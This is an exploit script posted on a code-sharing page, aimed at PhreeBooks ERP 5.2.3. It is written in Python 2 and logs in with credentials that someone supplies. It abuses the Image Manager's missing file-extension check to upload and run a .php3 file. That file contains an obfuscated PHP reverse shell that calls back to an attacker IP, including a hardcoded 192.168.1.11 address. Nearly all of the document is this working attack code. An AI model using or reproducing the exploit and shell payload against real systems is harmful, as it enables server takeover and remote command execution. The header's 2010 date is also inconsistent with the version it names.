扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
# Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution # Date: 2010-04-03 # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.phreesoft.com/ # Software Link: https://sourceforge.net/projects/phreebooks/ # Version: v5.2.3 # Category: Webapps # Tested on: XAMPP for Linux 5.6.38-0 # Software Description : PhreeBooks 5 is a completely new web based ERP / Accounting # application that utilizes the redesigned Bizuno ERP library from PhreeSoft # ================================================================== # PoC: There are no file extension controls on Image Manager. # If an authorized user is obtained, it is possible to run a malicious PHP file on the server. # The following basic python exploit uploads and executes PHP File for you. import requests import sys import urllib, re, random if (len(sys.argv) != 2): print "[*] Usage: poc.py <RHOST><RPATH> (192.168.1.10/test123)" exit(0) rhost = sys.argv[1] # Information Inputs UserName = str(raw_input("User Mail: ")) Password = str(raw_input("Password: ")) Aip = str(raw_input("Atacker IP: ")) APort = str(raw_input("Atacker Port: ")) Ready = str(raw_input("Do you listen to port "+APort+" through the IP address you attacked? Y/N ")) if Ready != "Y": print "You should listen your port with NetCat or other handlers!" sys.exit() # Login boundary = "1663866149167960781387708339" url = "http://"+rhost+"/index.php?&p=bizuno/portal/login" headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"} ldata="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserID\"\r\n\r\n"+UserName+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserPW\"\r\n\r\n"+Password+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"UserLang\"\r\n\r\nen_US\r\n-----------------------------"+boundary+"--\r\n" r = requests.post(url, headers=headers, data=ldata) cookies = r.headers['Set-Cookie'] cookie = re.split(r'\s', cookies)[6].replace(';','').replace('bizunoSession=','').strip() Ucookie = re.split(r'\s', cookies)[13].replace(';','').replace('bizunoUser=','').strip() # Upload fname = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3" exec_url = "http://"+rhost+"/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload" exec_cookies = {"bizunoLang": "en_US", "bizunoUser": ""+Ucookie+"", "bizunoSession": ""+cookie+""} exec_headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Referer": "http://"+rhost+"/index.php?", "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+"", "Connection": "close"} exec_data="-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgSearch\"\r\n\r\n\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"imgFile\"; filename=\""+fname+"\"\r\nContent-Type: binary/octet-stream\r\n\r\n<?php\n$ipaddr='"+Aip+"';\n$port="+APort+";\n@error_reporting(0);\n@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);\n$dis=@ini_get('disable_functions');\nif(!empty($dis)){\n$dis=preg_replace('/[, ]+/', ',', $dis);\n$dis=explode(',', $dis);\n$dis=array_map('trim', $dis);\n}else{\n$dis=array();\n}\n\n\nif(!function_exists('gsMRl')){\nfunction gsMRl($c){\nglobal $dis;\n\nif (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {\n$c=$c.\" 2>&1\\n\";\n}\n$oKFwG='is_callable';\n$iodQxhE='in_array';\n\nif($oKFwG('proc_open')and!$iodQxhE('proc_open',$dis)){\n$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);\n$o=NULL;\nwhile(!feof($pipes[1])){\n$o.=fread($pipes[1],1024);\n}\n@proc_close($handle);\n}else\nif($oKFwG('popen')and!$iodQxhE('popen',$dis)){\n$fp=popen($c,'r');\n$o=NULL;\nif(is_resource($fp)){\nwhile(!feof($fp)){\n$o.=fread($fp,1024);\n}\n}\n@pclose($fp);\n}else\nif($oKFwG('exec')and!$iodQxhE('exec',$dis)){\n$o=array();\nexec($c,$o);\n$o=join(chr(10),$o).chr(10);\n}else\nif($oKFwG('passthru')and!$iodQxhE('passthru',$dis)){\nob_start();\npassthru($c);\n$o=ob_get_contents();\nob_end_clean();\n}else\nif($oKFwG('shell_exec')and!$iodQxhE('shell_exec',$dis)){\n$o=shell_exec($c);\n}else\nif($oKFwG('system')and!$iodQxhE('system',$dis)){\nob_start();\nsystem($c);\n$o=ob_get_contents();\nob_end_clean();\n}else\n{\n$o=0;\n}\n\nreturn $o;\n}\n}\n$nofuncs='no exec functions';\nif(is_callable('fsockopen')and!in_array('fsockopen',$dis)){\n$s=@fsockopen(\"tcp://192.168.1.11\",$port);\nwhile($c=fread($s,2048)){\n$out = '';\nif(substr($c,0,3) == 'cd '){\nchdir(substr($c,3,-1));\n} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\nbreak;\n}else{\n$out=gsMRl(substr($c,0,-1));\nif($out===false){\nfwrite($s,$nofuncs);\nbreak;\n}\n}\nfwrite($s,$out);\n}\nfclose($s);\n}else{\n$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);\n@socket_connect($s,$ipaddr,$port);\n@socket_write($s,\"socket_create\");\nwhile($c=@socket_read($s,2048)){\n$out = '';\nif(substr($c,0,3) == 'cd '){\nchdir(substr($c,3,-1));\n} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {\nbreak;\n}else{\n$out=gsMRl(substr($c,0,-1));\nif($out===false){\n@socket_write($s,$nofuncs);\nbreak;\n}\n}\n@socket_write($s,$out,strlen($out));\n}\n@socket_close($s);\n}\n?>\n\r\n-----------------------------"+boundary+"--\r\n" requests.post(exec_url, headers=exec_headers, cookies=exec_cookies, data=exec_data) # Exec requests.get("http://"+rhost+"/myFiles/images/"+fname+"") |
体验盒子
